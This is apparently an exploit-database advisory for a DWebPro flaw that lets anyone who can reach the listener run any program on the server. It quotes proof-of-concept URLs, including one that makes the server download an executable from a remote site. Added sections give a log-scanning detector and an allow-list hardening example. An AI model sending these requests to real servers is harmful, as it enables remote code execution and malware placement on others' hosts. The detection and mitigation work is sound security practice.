Vendor: DWebPro
By: Rafael Sousa
CVSS: 8.8 (HIGH)
Type: Remote Execution
CWE: 78
Product Name: DWebPro
Affected Version From: Last version
Affected Version To: Older versions
Patch Exists: NO
Related CWE: N/A
CPE: dwebpro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2020

DWebPro Remote Execution Vulnerability

The latest version of DWebPro allows an attacker to execute an arbitrary program on the host running the server by requesting a single URL. The start handler under /dwebpro/ takes the path of the program to run in the file parameter and the arguments to pass to it in the params parameter, and launches that program on the server side with no restriction on which executable may be named. If file is given as an HTTP URL instead of a local path, the server opens the URL in a browser on the server side and downloads the file, so an attacker can also place a file of their choosing on the host. The proof of concept below targets the listener on 127.0.0.1:8080; the same request works from any host that can reach that port.
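The request shape above is easy to spot in web-server or proxy logs. The following scanner is an added example written for this page (it is not part of the original advisory or of DWebPro): it parses a constructed access log, picks out calls to the /dwebpro/start handler and classifies each as a local program launch or a remote download. The log format, the client addresses and all lines other than the two request targets quoted from the advisory are assumptions; the percent-encoded and mixed-case lines are included to show that a detection rule has to decode the query string and compare the path case-insensitively.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (hypothetical). Only the two request
# targets copied from the advisory are real; the other lines are made up to
# exercise the scanner, including a percent-encoded copy of the first target
# and a mixed-case path. Assumed format: "client-ip method request-target status".
SAMPLE_LOG = "\n".join([
    r"10.0.0.5 GET /dwebpro/index.html 200",
    r"10.0.0.9 GET /dwebpro/start?file=C:\windows\system32\notepad.exe&params=C:\hi.txt 200",
    r"10.0.0.9 GET /dwebpro/start?file=http://www.somesite.com.br/somefile.exe 200",
    r"10.0.0.9 GET /dwebpro/start?file=C%3A%5Cwindows%5Csystem32%5Cnotepad.exe&params=C%3A%5Chi.txt 200",
    r"10.0.0.7 GET /DWEBPRO/Start?file=C:\windows\system32\notepad.exe 200",
    r"10.0.0.7 GET /dwebpro/help 200",
])

LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<target>\S+) (?P<status>\d{3})$")
START_PATH = "/dwebpro/start"
# Anything that starts with a URL scheme ("http://", "https://", ...).
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def classify_request(target):
    """Return None if target is not a call to the DWebPro start handler,
    otherwise a dict describing what the request asks the server to do."""
    parts = urlsplit(target)
    # Compare the path case-insensitively: DWebPro runs on Windows, and a
    # detection rule should not be bypassed by a capitalisation change.
    if parts.path.lower() != START_PATH:
        return None
    # parse_qs also percent-decodes, so encoded backslashes are restored.
    qs = parse_qs(parts.query, keep_blank_values=True)
    file_arg = qs.get("file", [""])[0]
    params = qs.get("params", [""])[0]
    if SCHEME_RE.match(file_arg):
        kind = "remote_download"   # server opens a browser and fetches the URL
    elif file_arg:
        kind = "local_exec"        # server launches the named executable
    else:
        kind = "malformed"         # start handler called without a file
    return {"kind": kind, "file": file_arg, "params": params}


def scan_log(text):
    """Run classify_request over every parsable line; return the hits."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m["target"])
        if verdict:
            hits.append({"ip": m["ip"], **verdict})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

On the sample above the scanner reports four hits: two local launches of notepad.exe (one of them from the percent-encoded line), one remote download, and the mixed-case request, while the ordinary page requests are ignored.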

Mitigation:

No vendor patch is listed. Until one exists, do not expose the DWebPro listener (port 8080 in the proof of concept) to untrusted networks, and restrict or disable the /dwebpro/start handler. The proper fix is for the vendor to stop accepting an executable path, a URL or a free-form argument string from the request: the handler should accept only a fixed identifier that maps to an administrator-configured allow-list of programs, and should validate any arguments against a strict pattern instead of passing them through to the launched program.
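To make the allow-list approach concrete, here is an added example written for this page; it is not DWebPro's code and does not claim to reproduce how the product dispatches the start request. The unsafe function sketches the behaviour the advisory describes (path and arguments taken straight from the query string); the hardened function accepts only a key into a hypothetical ALLOWED_PROGRAMS table and resolves each argument as a plain file name under a hypothetical fixed directory. The program table, the data directory and the parameter pattern are assumptions chosen for illustration.

```python
import ntpath
import re
import subprocess
from urllib.parse import parse_qs

# Hypothetical allow-list: the only programs the web layer may launch, keyed by
# a short name that appears in the URL. The paths are chosen by the
# administrator, never by the client. (Illustrative values, not DWebPro config.)
ALLOWED_PROGRAMS = {
    "notepad": r"C:\Windows\System32\notepad.exe",
}
# Hypothetical fixed directory in which argument files must live.
DATA_DIR = r"C:\dwebpro\data"
# A single plain file name: no drive letter, no path separators, no leading dot
# (which also rules out "." and "..").
SAFE_PARAM = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")


class Rejected(Exception):
    """Raised when a request asks for something outside the allow-list."""


def build_launch_unsafe(query):
    """Sketch of the behaviour the advisory describes (not DWebPro's own code):
    the executable path and its arguments come straight from the query string,
    so any program on the host, or any URL, can be named by the client."""
    qs = parse_qs(query, keep_blank_values=True)
    return [qs.get("file", [""])[0]] + qs.get("params", [])


def build_launch_safe(query):
    """Hardened form: 'file' must be a key of ALLOWED_PROGRAMS and every
    'params' value must be a bare file name, which is resolved under DATA_DIR."""
    qs = parse_qs(query, keep_blank_values=True)
    name = qs.get("file", [""])[0]
    exe = ALLOWED_PROGRAMS.get(name)
    if exe is None:
        raise Rejected("program not in allow-list: %r" % name)
    argv = [exe]
    for p in qs.get("params", []):
        if not SAFE_PARAM.match(p):
            raise Rejected("argument is not a plain file name: %r" % p)
        argv.append(ntpath.join(DATA_DIR, p))
    return argv


def is_allowed(query):
    """True if the hardened handler would launch something for this query."""
    try:
        build_launch_safe(query)
        return True
    except Rejected:
        return False


def launch(argv):
    # shell=False: argv is handed over as a list and never goes through cmd.exe,
    # so argument text cannot be turned into extra commands.
    return subprocess.Popen(argv, shell=False)


if __name__ == "__main__":
    for q in ("file=notepad&params=hi.txt",
              r"file=C:\windows\system32\notepad.exe&params=C:\hi.txt",
              "file=http://www.somesite.com.br/somefile.exe"):
        print(q, "->", "allowed" if is_allowed(q) else "rejected")
```

With this shape both proof-of-concept requests from the advisory are rejected, while "file=notepad&params=hi.txt" launches the administrator-chosen notepad.exe on C:\dwebpro\data\hi.txt. If the launched program treats Windows device names specially, the parameter check should additionally reject names such as CON or NUL, which the pattern above alone does not catch.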

Exploit-DB raw data:

The last version of DWebPro allows an invader to execute any program. Just hit this in your browser:

http://127.0.0.1:8080/dwebpro/start?file=C:\windows\system32\notepad.exe&params=C:\hi.txt

And notepad.exe will open a txt file called hi at C:\ on the server's side.

If you try this: http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe it will open a browser on the server side and download the file.

It's really dangerous.

I tested this on the last version but it may work on older versions as well.

Best Regards,

Rafael Sousa